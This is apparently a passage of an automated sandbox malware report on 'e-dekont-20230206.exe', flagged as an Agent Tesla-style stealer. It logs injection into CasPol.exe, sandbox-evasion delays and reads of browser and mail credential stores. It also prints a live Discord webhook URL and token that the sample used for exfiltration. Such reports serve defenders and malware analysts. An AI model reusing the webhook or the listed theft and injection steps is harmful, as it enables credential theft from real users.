        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199297
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199167
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199015
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198906
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198797
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198531
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198279
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198171
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198041
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197921
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197813
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197496
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197264
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197156
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197031
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196922
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196813
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196510
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196406
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196288
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196171
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196063
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195844
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195703
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195593
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195484
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195374
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195265
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195155
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195042
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194922
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194703
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194593
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194483
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194375
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194263
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9564
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: CasPol.exe, 00000001.00000002.560208417.0000000006252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F20008
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeQueries volume information: C:\Users\user\Desktop\e-dekont-20230206.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara matchFile source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara matchFile source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR
        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts211
        Windows Management Instrumentation
        Path Interception311
        Process Injection
        1
        Disable or Modify Tools
        1
        OS Credential Dumping
        114
        System Information Discovery
        Remote Services11
        Archive Collected Data
        Exfiltration Over Other Network Medium3
        Ingress Tool Transfer
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information
        21
        Input Capture
        111
        Security Software Discovery
        Remote Desktop Protocol1
        Data from Local System
        Exfiltration Over Bluetooth11
        Encrypted Channel
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information
        1
        Credentials in Registry
        131
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares1
        Email Collection
        Automated Exfiltration4
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
        Software Packing
        NTDS1
        Application Window Discovery
        Distributed Component Object Model21
        Input Capture
        Scheduled Transfer15
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Timestomp
        LSA Secrets1
        Remote System Discovery
        SSH1
        Clipboard Data
        Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading
        Cached Domain Credentials1
        System Network Configuration Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items131
        Virtualization/Sandbox Evasion
        DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
        Process Injection
        Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Source | Detection | Scanner | Label | Link
        e-dekont-20230206.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.GenSteal |
        e-dekont-20230206.exe | 55% | Virustotal | | Browse
        e-dekont-20230206.exe | 100% | Joe Sandbox ML | |
        No Antivirus matches
        Source | Detection | Scanner | Label | Link | Download
        1.2.CasPol.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035 | | Download File
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://discord.com | 0% | URL Reputation | safe |
        http://discord.com | 0% | URL Reputation | safe |
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr | 0% | Avira URL Cloud | safe |
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31 | 0% | Avira URL Cloud | safe |
        https://discord.com4Dp | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        discord.com | 162.159.135.232 | true | true | | unknown
        api4.ipify.org | 64.185.227.155 | true | false | | high
        api.ipify.org | unknown | unknown | false | | high
        Name | Malicious | Antivirus Detection | Reputation
        https://api.ipify.org/ | false | | high
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr | true | Avira URL Cloud: safe | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://api.ipify.org | CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://discord.com | CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://discord.com | CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp | false | | high
        https://discord.com4Dp | CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31 | CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        64.185.227.155 | api4.ipify.org | United States | | 18450 | WEBNXUS | false
        162.159.135.232 | discord.com | United States | | 13335 | CLOUDFLARENETUS | true
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:800718
                    Start date and time:2023-02-07 18:40:32 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 8m 54s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample file name:e-dekont-20230206.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 17.5% (good quality ratio 13.2%)
                    • Quality average: 49.2%
                    • Quality standard deviation: 37.2%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
        Time | Type | Description
        18:41:28 | API Interceptor | 994x Sleep call for process: CasPol.exe modified
                    Process:C:\Users\user\Desktop\e-dekont-20230206.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):226
                    Entropy (8bit):5.354940450065058
                    Encrypted:false
                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                    MD5:B10E37251C5B495643F331DB2EEC3394
                    SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                    SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                    SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                    File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.959804344180061
                    TrID:
                    • Win64 Executable GUI Net Framework (217006/5) 47.53%
                    • Win64 Executable GUI (202006/5) 44.25%
                    • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                    • Win64 Executable (generic) (12005/4) 2.63%
                    • Generic Win/DOS Executable (2004/3) 0.44%
                    File name:e-dekont-20230206.exe
                    File size:695808
                    MD5:33a5f92deee382035467caff29a8d487
                    SHA1:7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
                    SHA256:e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
                    SHA512:c2c3a2ffc2719245166a561050a0c4d9ece584dea47997bb5db1cc30885e31e2a5af3cfbb27526835b10bdda71b572c307e8704a1ac53e9119cfe63c760f66af
                    SSDEEP:12288:vjsouJ3dUctF0KHbYXj/oNmsNjMQWwBTMYvwgScpK3J+ZBJwsscBDZn0Vx1NdB:2NUc7TbEDoNtQQWwKYvJScg63scDnu
                    TLSH:46E422177ACF0214D49829B282EF076503E95B85A1B7DABD3F4573AD06723E6BE43702
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........................z... ........... ....@...... ....................................`................................
                    Icon Hash:92aca8b2b2a2b286
                    Entrypoint:0x400000
                    Entrypoint Section:
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Time Stamp:0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:
                    Instruction
                    dec ebp
                    pop edx
                    nop
                    add byte ptr [ebx], al
                    add byte ptr [eax], al
                    add byte ptr [eax+eax], al
                    add byte ptr [eax], al
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x1b8c | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa98da | 0x1c | .text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x2000 | 0xa7974 | 0xa7a00 | False | 0.9695758179530202 | data | 7.97077131969678 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .sdata | 0xaa000 | 0x1e8 | 0x200 | False | 0.86328125 | data | 6.5950997415198165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0xac000 | 0x1b8c | 0x1c00 | False | 0.34444754464285715 | data | 5.438495976746426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country
                    RT_ICON | 0xac160 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | |
                    RT_ICON | 0xad208 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | |
                    RT_GROUP_ICON | 0xad670 | 0x22 | data | |
                    RT_VERSION | 0xad694 | 0x30c | data | |
                    RT_MANIFEST | 0xad9a0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                    02/07/23-18:41:32.301093 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Feb 7, 2023 18:41:27.266633987 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:27.266757011 CET | 443 | 49702 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:41:27.266869068 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:27.355532885 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:27.355787039 CET | 443 | 49702 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:41:27.679862976 CET | 443 | 49702 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:41:27.680044889 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:27.696712971 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:27.696759939 CET | 443 | 49702 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:41:27.697472095 CET | 443 | 49702 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:41:27.746340990 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:28.034023046 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:28.034092903 CET | 443 | 49702 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:41:28.132925987 CET | 443 | 49702 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:41:28.133024931 CET | 443 | 49702 | 64.185.227.155 | 192.168.2.5
                    Feb 7, 2023 18:41:28.133107901 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:28.134315968 CET | 49702 | 443 | 192.168.2.5 | 64.185.227.155
                    Feb 7, 2023 18:41:32.177478075 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Feb 7, 2023 18:41:32.177515984 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.177587032 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Feb 7, 2023 18:41:32.178462982 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Feb 7, 2023 18:41:32.178472042 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.237952948 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.238046885 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Feb 7, 2023 18:41:32.240590096 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Feb 7, 2023 18:41:32.240601063 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.241060019 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.243566990 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Feb 7, 2023 18:41:32.243582010 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.300604105 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.300971985 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Feb 7, 2023 18:41:32.300987959 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.434633017 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.434804916 CET | 443 | 49703 | 162.159.135.232 | 192.168.2.5
                    Feb 7, 2023 18:41:32.434914112 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Feb 7, 2023 18:41:32.509637117 CET | 49703 | 443 | 192.168.2.5 | 162.159.135.232
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Feb 7, 2023 18:41:27.189271927 CET | 60649 | 53 | 192.168.2.5 | 8.8.8.8
                    Feb 7, 2023 18:41:27.209341049 CET | 53 | 60649 | 8.8.8.8 | 192.168.2.5
                    Feb 7, 2023 18:41:27.222088099 CET | 51441 | 53 | 192.168.2.5 | 8.8.8.8
                    Feb 7, 2023 18:41:27.244609118 CET | 53 | 51441 | 8.8.8.8 | 192.168.2.5
                    Feb 7, 2023 18:41:32.139256954 CET | 49177 | 53 | 192.168.2.5 | 8.8.8.8
                    Feb 7, 2023 18:41:32.159280062 CET | 53 | 49177 | 8.8.8.8 | 192.168.2.5
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Feb 7, 2023 18:41:27.189271927 CET | 192.168.2.5 | 8.8.8.8 | 0x302e | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:27.222088099 CET | 192.168.2.5 | 8.8.8.8 | 0x612d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:32.139256954 CET | 192.168.2.5 | 8.8.8.8 | 0x8350 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Feb 7, 2023 18:41:27.209341049 CET | 8.8.8.8 | 192.168.2.5 | 0x302e | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
                    Feb 7, 2023 18:41:27.209341049 CET | 8.8.8.8 | 192.168.2.5 | 0x302e | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
